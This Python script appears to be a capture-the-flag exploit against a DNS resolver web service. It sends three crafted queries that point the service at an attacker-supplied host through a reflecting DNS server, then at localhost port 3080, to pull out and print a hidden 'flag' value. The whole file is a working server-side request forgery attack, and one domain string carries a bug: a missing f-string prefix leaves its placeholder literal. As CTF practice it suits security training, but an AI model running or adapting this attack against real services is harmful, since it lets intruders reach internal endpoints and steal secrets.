#!/usr/bin/env python3
import sys
import json
import requests
# Hostname of a DNS server that reflects the subdomain in its response,
# e.g. `example.com.my-reflecting-dns.com` should resolve to `example.com`.
# Used below to build the names handed to the target service.
# TODO: change this to your server's hostname
REFLECTING_DNS = 'my-reflecting-dns.com'
def expect(predicate, msg):
    """Report *msg* as PASSED or FAILED; a failed check terminates the script.

    Args:
        predicate: truthy value meaning the check succeeded.
        msg: label printed after the PASSED:/FAILED: prefix.
    """
    if predicate:
        print('PASSED:', msg)
        return
    print('FAILED:', msg)
    # Stop at the first failed step; later steps depend on earlier ones.
    exit(1)
def resolve(base_url, query):
    """POST *query* as a JSON document to ``{base_url}/query`` and return the response.

    Args:
        base_url: service origin, without a trailing slash.
        query: JSON-serialisable dict describing the lookup.

    Returns:
        The ``requests.Response`` object, unchecked.
    """
    payload = json.dumps(query)
    headers = {'content-type': 'application/json'}
    return requests.post(f'{base_url}/query', data=payload, headers=headers)
def exploit(base_url, attacker_host, attacker_port):
    """Send the three-step query sequence to *base_url* and print the final answer.

    The first two steps submit ``attacker_host`` under REFLECTING_DNS with
    ``attacker_port``; the third submits ``part_3_domain`` on port 3080 with a
    GET path whose query parameters reference the two earlier names and
    ``flag``. Each step's HTTP status is checked with ``expect`` before the
    next one runs, and the decoded ``data`` array of the first answer of the
    third response is printed as text.
    """
    def make_query(name, port, path, **extra):
        # Common request shape; extra keys are appended after the fixed ones
        # so the serialised JSON keeps the same key order as before.
        query = {
            'name': name,
            'port': port,
            'useHttps': False,
            'path': path,
            'type': 'A',
            'klass': 'IN',
        }
        query.update(extra)
        return query

    part_1_domain = f'{attacker_host}.{REFLECTING_DNS}'
    part_2_domain = f'{attacker_host}.{REFLECTING_DNS}'
    part_3_domain = 'localhost.{REFLECTING_DNS}'

    first = resolve(base_url, make_query(part_1_domain, attacker_port, '/doh'))
    print(first.status_code)
    expect(first.status_code == 200, 'resolve 1')

    second = resolve(base_url, make_query(part_2_domain, attacker_port, '/doh'))
    expect(second.status_code == 200, 'resolve 2')

    # Implicit concatenation; the resulting string is unchanged.
    path = (
        f'/api?query[]=lastAnswer:{part_1_domain}'
        f'&query[]=lastAnswer:{part_2_domain}'
        '&query[]=lastAnswer:flag#'
    )
    third = resolve(base_url, make_query(part_3_domain, 3080, path, method='GET'))
    expect(third.status_code == 200, 'resolve 3')

    body = json.loads(third.text)
    code_points = body['answers'][0]['data']['data']
    print(''.join(map(chr, code_points)))
def main():
    """Read ``<baseurl> <attacker-host> <attacker-port>`` from argv and call exploit().

    Prints a usage line and exits with status 1 unless exactly three
    arguments are given; the port is converted with ``int``.
    """
    args = sys.argv[1:]
    if len(args) != 3:
        print(f'Usage: {sys.argv[0]} <baseurl> <attacker-host> <attacker-port>')
        exit(1)
    base_url, attacker_host, port_text = args
    exploit(base_url, attacker_host, int(port_text))
# Script entry point; nothing runs on import.
if __name__ == '__main__':
    main()